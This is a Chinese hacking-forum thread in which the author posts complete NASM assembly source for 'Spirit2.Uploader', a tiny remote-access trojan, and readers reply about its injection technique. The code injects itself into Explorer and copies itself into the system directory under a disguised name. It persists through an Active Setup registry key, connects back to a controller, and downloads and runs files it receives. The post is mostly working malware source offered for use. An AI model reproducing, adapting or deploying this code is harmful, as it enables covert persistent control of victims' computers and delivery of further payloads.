[原创]Spirit2.Uploader Source:Anskya(已附图)
文章作者:Anskya信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
好久没有发贴了...最近感冒发烧,股票大跌,十七大召开,萨拉热窝交火,还有《学校的日子》结局引起大家争议,眼睛肿。。。
等等事情搞得自己灰心了
发个帖吧
还记得那个超小的RAT吗???1.37k的穿墙,Spirit系列是全世界最小的RAT
Spirit2=1775字节
Spirit3=1558字节
Spirit4=1400字节
反向连接,穿墙(特异功能.支持Win9x下穿墙.使用RT32_LIB注入引擎),现在贡献出来让大家赏玩。。。
希望可以结识更多喜欢ASM优化编程,和linux夸平台编程的朋友.
这个版本是Sp2---编译后体积1775字节
端口监听端口自己修改我懒得写生成器目前只有(代码有注释的)。。。nasm
不会玩masm32那么“高级”的东西,玩些低级货。。。
代码是nasm编译的。不会玩的朋友不要说我什么。。。
默认监听端口4862自己在代码里面修改吧
[attach]6765[/attach]
[language=asm]
;===============================================
; Spirit2.Uploader Coder:Anskya
; Email: [email]Anskya@Gmail.com[/email]
;
; Spirit2.Uploader.code:100%(Server)-------code inject
; Spirit3.b1.Uploader.code:100%(Server)----up
; Spirit3.b2.Uploader.code:100%(Server)----up
; Spirit4.Uploader.b1.code:100%(Server)----up
; C-One 1.0.0.0.code:100%(Server----shit!)-code inject(no elirt)
; Bifrost.1.102.code:100%(Server)----------dll (memory pe loader) inject(use elirt)+plugin memory loader
; Poison Ivy 2.0.0-2.14:100%(Server)-------code inject(no use elict)-code plugin
; tequila bandita 1.3b2.code:100%(Server)--dll Memory Inject
; Nuclear Seed 1.1.code:100%(Server+Client)----process hjeck
;
; Bifrost.1.21.code:30%(Server)------------dll (memory pe loader) inject(use elirt)
; Flux.1.01.code:70%(Server)---------------code inject(use elirt)-code plugin
; Poison Ivy 2.20-2.30.code:10%(Server)----code inject(no use elict)-code plugin
;
; Thank:drocon,coban2k,iciko,ksv,Gargamel,shapeless,Caecigenus,stm
;
; 完全原版逆向...编译器:Nasm 0.39.38 or Yasm 0.61
; nasmw -fbin Spirit2a.asm -o Spirit2a.exe
;===============================================
[BITS 32]
%define CODE_BASE 1000h
%define DATA_BASE CODE_BASE
%define RVADIFF 1000h-200h
%define imagebase 00400000h
%define reloc RVADIFF+imagebase
%define MAX_PATH 260
MZ_Header:
.magic dw "MZ"
.cblp dw 0
.cp dw "IC"
.crlc dw "IK"
.cparhdr dw "O"
.minalloc dw 0
;.cblp dw "[C"
;.cp dw "]A"
;.crlc dw "ns"
;.cparhdr dw "ky"
;.minalloc dw "a"
PE_Header:
.Signature dd "PE"
.Machine dw 14Ch
.NumberOfSections dw 1
IAT_User32:
.TimeDateStamp dd 0
.PointerToSymbolTable dd 0
.NumberOfSymbols dd 0
.SizeOfOptionalHeader dw 0E0h
.Characteristics dw 103h
Optional_Header:
.Magic dw 10Bh
.MajorLinkerVersion db 0
.MinorLinkerVersion db 0
.SizeOfCode dd CODE_BASE
.SizeOfInitializedData dd 0
.SizeOfUninitialzedData dd 0
.AddressOfEntryPoint dd code+RVADIFF
.BaseOfCode dd 1000h
;.BaseOfData dd DATA_BASE
.lfanew dd 0Ch
;align 16, DB 0
.ImageBase dd imagebase
.SectionAlignment dd 1000h
.FileAlignment dd 200h
.MajorOperSystemVersion dw 4h
.MinorOperSystemVersion dw 0h
.MajorImageVersion dw 0h
.MinorImageVersion dw 0h
.MajorSubsystemVersion dw 4
.MinorSubsystemVersion dw 0
.Reserved1 dd 0h
.SizeOfImage dd 2000h
.SizeOfHeaders dd import
.CheckSum dd 0h
.Subsystem dw 2
.DllCharacteristics dw 0h
.SizeOfStackReserve1 dd 100000h
.SizeOfStackCommit1 dd 2000h
.SizeOfStackReserve2 dd 100000h
.SizeOfStackCommit2 dd 1000h
.LoaderFlags dd 0h
.NumberOfRvaAndSizes dd 10h
Data_Directories:
.Export times 2 dd 0h
.Import dd import+RVADIFF, import_end-import
.Resource times 2 dd 0
.Exception times 2 dd 0h
.Security times 2 dd 0h
.Relocation times 2 dd 0h
.Debug times 2 dd 0h
.Architecture times 2 dd 0h
.GlobalPtr times 2 dd 0h
.TLS times 2 dd 0h
.LoadConfig times 2 dd 0h
.BoundImport times 2 dd 0h
.IAT times 2 dd 0h
.DelayImport times 2 dd 0h
.ComDescriptor times 2 dd 0h
.Reserved times 2 dd 0h
;PE节----至少要有一个PE节
sections:
.SectionName db "spirit2",0
.VirtualSize dd 1000h
.VirtualAddress dd 1000h
.SizeOfRawData dd code_end-import
.PointerToRawData dd import
.PointerToRelocations dd 0h
.PointerToLinenumbers dd 0h
.NumberOfRelocations dw 0h
.NumberOfLinenumbers dw 0h
.Characteristics dd 0E00000D0h
;============================================================================================
; 循环启动自身.查找Explorer
Find_Process:
push 11h
pop ecx
@loop_push1:
push edi
loop @loop_push1
push esp
push esp
push 7
pop ecx
@loop_push2:
push edi
loop @loop_push2
lea eax, [reloc + __GetCurrentPath]
push eax
call [reloc + __CreateProcessA]
push 11h
pop ecx
@loop_pop:
pop eax
loop @loop_pop
popad
retn
; Win9x插入函数
Inject_Win9x:
push 40h
push 08003000h
push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH * 2)
push edi
call [reloc + __VirtualAlloc]
; Write Memory
push 8
push edi
push eax
push edi
push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH)
lea edx, [reloc + __RemoteCodeStart]
push edx
push eax
push esi
call [reloc + __WriteProcessMemory]
; CreateRemoteThread For Win9x
call [reloc + __GetCurrentProcessId]
xor eax, [fs:030h]
xor ebx, eax
mov esi, [reloc + __DebugActiveProcess]
; 搜索CreateRemoteThread9x
@search_crt9x:
inc esi
cmp dword [esi], 0E857FFFFh
jnz @search_crt9x
lodsd
lodsd
add eax, esi
push -1000h
push ebx
call eax
; 搜索OpenThread9x
push edi
push eax
mov esi, [reloc + __OpenProcess]
@search_opt9x:
inc esi
cmp dword [esi], 0E832FF50h
jnz @search_opt9x
lodsd
lodsd
add eax, esi
push ebx
call eax
popad
retn
dll002 db "USER32",0
__ExplorerWindow db 'shell_traywnd',0
align 200h, DB 0
import dd 0
dd 0
dd -1
dd dll001+RVADIFF
dd api001+RVADIFF
times 5 dd 0 ;NULL DLL ENTRY
dll001 db "KERNEL32.DLL",0
;kernel32 apis
api001 dd api101+RVADIFF
dd 0
api101 dw 0
db "ExitProcess",0
import_end:
code:
pushad
lea ebx, [reloc + __LoadLibraryA]
call GetKernel32
lea eax, [imagebase + dll002]
push eax
call [reloc + __LoadLibraryA]
call GetFunctions
xor edi, edi
; 获取自身路径
push MAX_PATH
lea eax, [reloc + __GetCurrentPath]
push eax
push edi
call [reloc + __GetModuleFileNameA]
push 1024
call [reloc + __Sleep]
;Debug
;call RemoteCode
; 查找Explorer.exe窗口
push edi
lea eax, [imagebase + __ExplorerWindow]
push eax
call [reloc + __FindWindowA]
test eax, eax
jnz @Inject_Process
; 启动自身,再次查找Exlorer窗口
lea eax, [imagebase + Find_Process]
jmp eax
; 注入代码To 远程进程(Explorer)
@Inject_Process:
push eax
push esp
push eax
call [reloc + __GetWindowThreadProcessId]
pop eax
xchg eax, ebx
push ebx
push edi
push 01F0FFFh
call [reloc + __OpenProcess]
xchg eax, esi
; 判断是否为Win9x
call [reloc + __GetVersion]
cmp eax, 080000000h
jb @Inject_WinNT
; 执行Win9x插入
lea eax, [imagebase + Inject_Win9x]
jmp eax
@Inject_WinNT:
push 40h
push 3000h
push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH * 2)
push edi
push esi
call [reloc + __VirtualAllocEx]
push eax
push esp
push edi
push edi
push eax
push edi
push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH)
lea ebx, [reloc + __RemoteCodeStart]
push ebx
push eax
push esi
call [reloc + __WriteProcessMemory]
push edi
push edi
push esi
call [reloc + __CreateRemoteThread]
pop eax
popad
retn
;=============================================
; RemoteCode
__RemoteCodeStart:
RemoteCode:
pushad
call @Start
@Start:
pop ebx
add ebx, (__LoadLibraryA - @Start)
; Load WS2_32
push '32'
push 'ws2_'
push esp
call [ebx + (__LoadLibraryA - __LoadLibraryA)] ; LoadLibraryA
call GetFunctions
; Load Advapi32
push 0
push 'pi32'
push 'adva'
push esp
call [ebx + (__LoadLibraryA - __LoadLibraryA)] ; LoadLibraryA
call GetFunctions
push 5
pop ecx
@@Loop_Pop:
pop eax
loop @@Loop_Pop
; 安装文件
; 获取安装目录
push MAX_PATH
lea edi, [ebx + (__GetCurrentPath - __LoadLibraryA) + MAX_PATH]
push edi
call [ebx + (__GetSystemDirectoryA - __LoadLibraryA)]
push edi
add edi, eax
lea esi, [ebx + (__SetupFileName - __LoadLibraryA)]
; 连接文件名
push 15
pop ecx
rep movsb
pop edi
; 删除已经存在的安装文件
; push edi
; call [ebx + (__DeleteFileA - __LoadLibraryA)]
;
; Copy File
push 0
push edi
lea eax, [ebx + (__GetCurrentPath - __LoadLibraryA)]
push eax
call [ebx + (__CopyFileA - __LoadLibraryA)]
; 填写注册表
; 打开键值
push esi
lea eax, [ebx + (__ActiveRegedir - __LoadLibraryA)]
push eax
push 080000002h
call [ebx + (__RegCreateKeyA - __LoadLibraryA)]
; ; 填写键值
push 0b4h
push edi
push 1
push 0
lea eax, [ebx + (__ActiveSetup - __LoadLibraryA)]
push eax
push dword [esi]
call [ebx + (__RegSetValueExA - __LoadLibraryA)]
; 关闭句柄
push dword [esi]
call [ebx + (__RegCloseKey - __LoadLibraryA)]
; 创建Socket连接
;WSAStartup
sub esp, 0800h
mov edi, esp
push edi
push 1
call [ebx + (__WSAStartup - __LoadLibraryA)]
@Loop_Online:
;closesocket
push ebp
call [ebx + (__closesocket - __LoadLibraryA)]
;socket
push 6
push 1
push 2
call [ebx + (__socket - __LoadLibraryA)]
; 删除注册表
xchg eax, ebp
lea eax, [ebx + (__ActiveRegedir - __LoadLibraryA)]
push eax
push 080000001h
call [ebx + (__RegDeleteKeyA - __LoadLibraryA)]
@Loop_connect:
;Sleep
push 0800h
call [ebx + (__Sleep - __LoadLibraryA)]
; 终于可以连接了
lea eax, [ebx + (__MasterAddress - __LoadLibraryA)]
push eax
call [ebx + (__gethostbyname - __LoadLibraryA)]
test eax, eax
je @Loop_connect
; 压入端口开始连接
mov eax, dword [eax + 0ch]
mov eax, dword [eax]
push dword [eax]
push 0FE120002h ;端口值---使用htons转换后的数值--写生成器时注意
pop dword [edi]
pop dword [edi + 4]
;connect
push 010h
push edi
push ebp
call [ebx + (__connect - __LoadLibraryA)]
jnz @Loop_Online
push 0
;GetComputerNameA
push 010h
push esp
push edi
call [ebx + (__GetComputerNameA - __LoadLibraryA)]
jmp short @Send_OnlineInfo
; 循环接受数据包
@Recv_Buffer:
push 0
push 0800h
push edi
push ebp
call [ebx + (__recv - __LoadLibraryA)]
inc eax
je @Loop_Online
dec eax
je @Loop_Online
mov dh, byte [edi]
inc edi
call @Create_File
dec edi
; 数据发送函数
@Send_Buffer:
push 0
push 2
@Send_OnlineInfo:
push edi
push ebp
call [ebx + (__send - __LoadLibraryA)]
@Send_Loop:
jmp short @Recv_Buffer
; 解析接受到的命令----看表头注明函数功能
@Parse_Cmd:
@Parse_Done:
mov byte [edi], 78h
retn
@Create_File:
dec dh
jnz @Wirte_File
xor ecx, ecx
push ecx
push ecx
push 2
push ecx
push ecx
push 040000000h
push edi
call [ebx + (__CreateFileA - __LoadLibraryA)]
inc eax
je @Parse_Done
dec eax
xchg eax, esi
retn
@Wirte_File:
dec dh
jnz @Close_File
dec eax
push 0
push ecx
push eax
push edi
push esi
call [ebx + (__WriteFile - __LoadLibraryA)]
test eax, eax
je @Parse_Done
retn
@Close_File:
dec dh
jnz @Parse_UnInstall
push esi
call [ebx + (__CloseHandle - __LoadLibraryA)]
@Execute_File:
push 0Ah
push edi
call [ebx + (__WinExec - __LoadLibraryA)]
cmp eax, 31
jns @Parse_Done
retn
@Parse_UnInstall:
dec dh
jnz @Close_Socket
; 删除注册表
lea eax, [ebx + (__ActiveRegedir - __LoadLibraryA)]
push eax
push 080000002h
call [ebx + (__RegDeleteKeyA - __LoadLibraryA)]
; 删除安装文件
lea eax, [ebx + (__GetCurrentPath - __LoadLibraryA) + MAX_PATH]
push eax
call [ebx + (__DeleteFileA - __LoadLibraryA)]
jmp @Close_SocketProc
@Close_Socket:
dec dh
jnz @Parse_Ping
@Close_SocketProc:
push ebp
call [ebx + (__closesocket - __LoadLibraryA)]
pop eax
; exit
@Exit_Loop:
add esp, 0800h
popad
retn
@Parse_Ping:
dec dh
jnz @Parse_Is9x
mov byte [edi], 32h
ret
@Parse_Is9x:
dec dh
jnz @Parse_Exit
call [ebx + (__GetVersion - __LoadLibraryA)]
cmp eax, 080000000h
jnb @Parse_Exit
inc byte [edi]
@Parse_Exit:
retn
;=============================================
; get kernel32 base
GetKernel32:
mov eax, [fs:30h]
test eax, eax
js @@os_9x
@@os_nt:
mov eax, [eax + 0ch]
mov esi, [eax + 1ch]
lodsd
mov eax, [eax + 08h]
jmp short @@finished
@@os_9x:
mov eax, [eax+034h]
mov eax, [eax+0b8h]
@@finished:
;retn
; HashGetProcAddress thank coban2k
GetFunctions:
xchg eax, ebp
mov eax, dword [ebp+03Ch] ; PE
mov eax, dword [ebp+eax+078h] ; Export Table RVA
lea esi, [ebp+eax+018h] ; Export Table VA+18h
lodsd
xchg eax, ecx ; NumberOfNames
lodsd ; AddressOfFunctions
push eax
lodsd ; AddressOfNames
add eax, ebp
xchg eax, edx
lodsd ; AddressOfNameOrdinals
add eax, ebp
push eax
xchg esi, edx
@next_func:
lodsd
add eax, ebp
xor edx, edx
@calc_hash:
rol edx, 3
xor dl, byte [eax]
inc eax
cmp byte [eax], 0
jnz @calc_hash
mov edi, ebx
@scan_dw_funcs:
cmp dword [edi], edx
jnz @Skip_function
mov eax, dword [esp]
movzx eax, word [eax]
shl eax, 2
add eax, dword [esp+4]
mov eax, dword [eax+ebp]
add eax, ebp
stosd
@Skip_function:
scasd
cmp dword [edi], 0
jnz @scan_dw_funcs
add dword [esp], 2
loop @next_func
pop eax
pop eax
ret
; =======API Hash Address
__FunAddress:
__LoadLibraryA dd 0A412FD89h
__WinExec dd 0016EF74Bh
__CreateProcessA dd 08EF94368h
__Sleep dd 00005F218h
__DeleteFileA dd 049462A7Bh
__GetModuleFileNameA dd 060F43F1Bh
__GetSystemDirectoryA dd 0B8E579C1h
__CopyFileA dd 04F182A69h
__CreateFileA dd 038C62A7Ah
__WriteFile dd 058D8C545h
__CloseHandle dd 0C0D6D616h
__closesocket dd 0C0CBAF87h
__connect dd 001BDA62Ch
__gethostbyname dd 0208651E9h
__send dd 00000FC54h
__socket dd 0003FAF9Ch
__recv dd 00000FE2Eh
__WSAStartup dd 0E250EADAh
__RegSetValueExA dd 09775A748h
__RegCreateKeyA dd 0A718D938h
__RegDeleteKeyA dd 08928D938h
__RegCloseKey dd 0C6E06B86h
__GetComputerNameA dd 0BA2070DFh
__GetVersion dd 052ED5F54h
__FindWindowA dd 0ABEEB02Bh
__GetWindowThreadProcessId dd 0850BA256h
__OpenProcess dd 029BF2CBBh
__VirtualAllocEx dd 0C5B429FAh
__WriteProcessMemory dd 0B04AD555h
__CreateRemoteThread dd 04A5F66C2h
__DebugActiveProcess dd 031978FE3h
__GetCurrentProcessId dd 06D5EA21Eh
__VirtualAlloc dd 0AB16D0AEh
__ActiveSetup db 'StubPath',0
;__MasterPort dd 0FE120002h
__MasterAddress db '127.0.0.1',0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
__ActiveRegedir db 'SOFTWARE\Microsoft\Active Setup\Installed Components\'
__ActiveRegHex db '{2A202488-F02D-11cf-64CD-1123AFEECF20}',0
__SetupFileName db '\msvrhost32.exe',0
__GetCurrentPath:
__RemoteCodeEnd:
%define RemoteCodeSize $ - RemoteCode
code_end:
[/language] 强奸了Poison Ivy和Bifrost 而诞生的东西 经典............... 检查不到进程,也没看出插入哪个进程,用的是第三方安全检测工具。
只稍微学过16位的asm,32位的。。。
哪个大大告诉下,这个是rootkit级别的? __OpenProcess dd 029BF2CBBh
__VirtualAllocEx dd 0C5B429FAh
__WriteProcessMemory dd 0B04AD555h
__CreateRemoteThread dd 04A5F66C2h 国内木马好象很少有使用代码注入的(木偶是个例外),基本上都是DLL注入.
再不然就是新建一个傀儡进程.
楼主的这个东东应该是真正的代码注入. [quote]引用第2楼hitlerboy于2007-11-03 01:01发表的 :
检查不到进程,也没看出插入哪个进程,用的是第三方安全检测工具。
只稍微学过16位的asm,32位的。。。
哪个大大告诉下,这个是rootkit级别的?[/quote]
本人也有点期待这个问题
这应该算不上ROOTKIT级别吧。
功能个人感觉过少 [quote]引用第4楼andds于2007-11-03 11:18发表的 :
国内木马好象很少有使用代码注入的(木偶是个例外),基本上都是DLL注入.
再不然就是新建一个傀儡进程.
楼主的这个东东应该是真正的代码注入.[/quote]
木偶是一种类似HijackProcess的技术
不过是使用了创建进程映射内存的类似傀儡进程!
Spirit2.Uploader是注入已有进程...--而且支持Win9x下注入
木偶需要另外新建一个傀儡进程!不支持Win9x~
如果那个算代码注入的话~~我也不知道说什么好。。。
爆木偶的料:
数据压缩使用ntdll的
RtlCompressBuffer,RtlGetCompressionWorkSpaceSize
压缩屏幕传输数据~呵呵~下次继续爆料 *** 作者被禁止或删除 内容自动屏蔽 *** [quote]引用第6楼Anskya于2007-11-03 20:43发表的 :
压缩屏幕传输数据~呵呵~下次继续爆料
.......[/quote]
期待小零同志继续暴料...[s:265] 2003下面直接报错。。运行8了! Poison Ivy 2.0.0-2.14:100%(Server)-------code inject(no use elict)-code plugin
强悍,发出来看看啊 [quote]原帖由 [i]寂寞宝贝[/i] 于 2007-11-7 08:24 发表 [url=https://forum.eviloctal.com/redirect.php?goto=findpost&pid=103284&ptid=31129][img]images/common/back.gif[/img][/url]
2003下面直接报错。。运行8了! [/quote]晕倒。我的2003也出现这情况。
.
页:
[1]